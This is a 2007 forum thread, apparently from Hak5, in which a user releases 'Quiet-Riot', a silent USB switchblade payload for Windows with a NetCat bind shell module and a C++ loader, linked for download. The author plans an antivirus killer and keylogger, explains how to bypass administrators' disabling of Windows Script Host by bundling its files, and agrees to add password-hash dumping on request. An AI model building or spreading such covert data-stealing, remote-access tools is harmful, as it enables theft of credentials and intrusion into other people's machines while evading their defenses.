twsSentinel Posted January 27, 2007 Share Posted January 27, 2007 Hello all, Here's a recent U3 Switchblade project in the works. The Quiet-Riot was designed with three things in mind: 1. Extremely easily customizable. 2. 100% silent/compatible on all Windows OS's (>= Win2k + 64bit) 3. U3 Program Installer Why this payload was written: I currently work and develop in Windows 2003 Server x64 environment. I found all other payloads on here to not be 100% silent. (No console windows) I also found the use of .bat files to be tiresome to debug and go through. Also the lack of ease for turning on and off payload modules. This is not to say the other payloads aren't great. I think they're excellent. I base the Quiet-Riot straight from them, but with improved features. I would have never written this if it weren't for them. Thank you fellow developers! On to the payload: [screen-Shots] http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_1.JPG http://tws.serveftp.org/software/QuietRiot/QR_Tutorial_2.JPG http://tws.serveftp.org/software/QuietRiot..._Tutorial_1.JPG http://tws.serveftp.org/software/QuietRiot..._Tutorial_2.JPG [Download] QuietRiot.zip » The actual payload. QRLoader.zip » The C++ Source for the main exe file. Tools.zip » A collection of most of the tools listed at Hak5.org Quiet-Riot U3 Installer(u3p).zip » A U3 QuietRiot Installer (INSTALLS BUT NOT FUNCTIONAL YET!)(For developer use) These files are hosted on my server. My max upload speed is 128KB/s. Feel free to upload these to rapid share or public share sites if you like. [QuietRiot.zip] http://tws.serveftp.org/software/QuietRiot/QuietRiot.zip 137KB [QRLoader.zip] http://tws.serveftp.org/software/QuietRiot/QRLoader.zip 3.14MB [Tools.zip] http://tws.serveftp.org/software/QuietRiot/Tools.zip 889KB [u3Installer.zip] http://tws.serveftp.org/software/QuietRiot/U3Installer.zip 220KB *** I have not included a Anti-Virus Killer or KeyLogger in the Tools.zip. I will be doing some research on AVKillers before updating QuietRiot with one. As for the KeyLogger, since I do developing on a x64 system, most small keyloggers lock up the system. Will update the payload once more research is done as well. If you need help installing or getting the payload to work, just post here. If you have any suggestions/bugs/comments post here as well or message me. Thanks Hak5 for making such a great site!!! UPDATE 1.28.07 There are two small updates made to the payload script. 1. For the NetCat Bindshell module, if you turn on the "2Drive" option, I forgot to add a "xcopy /B". The '/B' signifies that its a binary file to copy. 2. In the "System Info" module, I had a pointless WScript.Disconnect ObjFile command. I just removed it since it did nothing. The ObjFile was just reset once the next module is loaded. Newest Quiet-Riot Version http://tws.serveftp.org/software/QuietRiot...iot(UPDATE).zip // This is only the vbscript payload file. The QuietRiot.zip has already been updated as well.[/b] Quote Link to comment Share on other sites More sharing options...
anyedie Posted January 28, 2007 Share Posted January 28, 2007 I like the idea but, Can anyone validate these files? Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted January 28, 2007 Author Share Posted January 28, 2007 understandable concern... especially since I'm new to the community here. But I stand by my work. The QRLoader source code is provided and anyone who can understand VBScript can verify the payload script. Other than that, I guess there's nothing more I can say. Hopefully a developer will check the script for you all. -Sent The Tools.zip contains the most recent NirSoft apps too. Quote Link to comment Share on other sites More sharing options...
Deveant Posted January 28, 2007 Share Posted January 28, 2007 hmm my VM is still chugging along, so i supos its safe. Quote Link to comment Share on other sites More sharing options...
anyedie Posted January 29, 2007 Share Posted January 29, 2007 understandable concern...especially since I'm new to the community here. But I stand by my work. The QRLoader source code is provided and anyone who can understand VBScript can verify the payload script. Other than that, I guess there's nothing more I can say. Hopefully a developer will check the script for you all. -Sent The Tools.zip contains the most recent NirSoft apps too. Yea, I just get weary about being 1st to download, but very nice work twsSentinel, I like it. Quote Link to comment Share on other sites More sharing options...
twist3r Posted January 29, 2007 Share Posted January 29, 2007 what happens if admins have disabled the script server? won't the vbs not run? Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted January 29, 2007 Author Share Posted January 29, 2007 what happens if admins have disabled the script server? won't the vbs not run? Well, most admins disable the WSH by removing the file association (.vbs). Sometimes they also delete or rename "wscript.exe" and "cscript.exe" on their systems. However, the QRLoader.exe is coded to execute wscript.exe while passing QuietRiot.vbs as arg. I'm not too familiar with how the WSH runs thoroughly, but I'm almost positive it requires "vbscript.dll" to compile vbscript. So if you want to make the QuietRiot Payload even more powerful ... maybe try including "vbscript.dll" in the directory containing QRLoader.exe, QuietRiot.vbs, and WScript.exe. This way even if the .vbs file-association has been removed, or WScript.exe has been deleted or renamed, the Quiet-Riot Payload has all the necessary dependencies to run. Hope this helps ... I'll do some more research on WSH Security and make sure this work-around really works! -Sent Quote Link to comment Share on other sites More sharing options...
Axonic Posted January 31, 2007 Share Posted January 31, 2007 Wow...major props to you for taking the next big step in the USB switchblade. One Question...I didn't download the Loader, what does it do? Request/Segestion:(for I don't know VBS) Add seperate PWDump log like in other switchblades Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted January 31, 2007 Author Share Posted January 31, 2007 Thanks for the response. The QRLoader is an exe file which executes wscript.exe (Windows Script Host 5.6) and tells the WSH to run QuietRiot.vbs (the payload). It's not a required file, but very helpful. You can use it to configure your autorun.inf and other things like the U3 installer. The QRLoader is also open source, so any c++ developers can easily write extra features in it. Something that I've been meaning to write a small article on. Thank you for the suggestion/request ... That will be added into the payload in the next version. If I have some time later tonight .. I code it in quickly. Quote Link to comment Share on other sites More sharing options...
Axonic Posted February 1, 2007 Share Posted February 1, 2007 Awesome, sounds great. Cept...I can't get the QRLoader to run. Will it pop up a window like in your screenshot? (QRLoader.exe in the Debug folder) Thanks Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted February 1, 2007 Author Share Posted February 1, 2007 Nothing will show when the QRLoader runs. That's the point of having it 100% silent. lol It automatically executes QuietRiot.vbs via WScript.exe In order for it to work, however, the QRLoader.exe MUST be in the same folder as "QuietRiot.vbs" & "WScript.exe". If you want it in a different folder, you'll have to edit the C++ code and recompile it. But it's only a minor adjustment. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.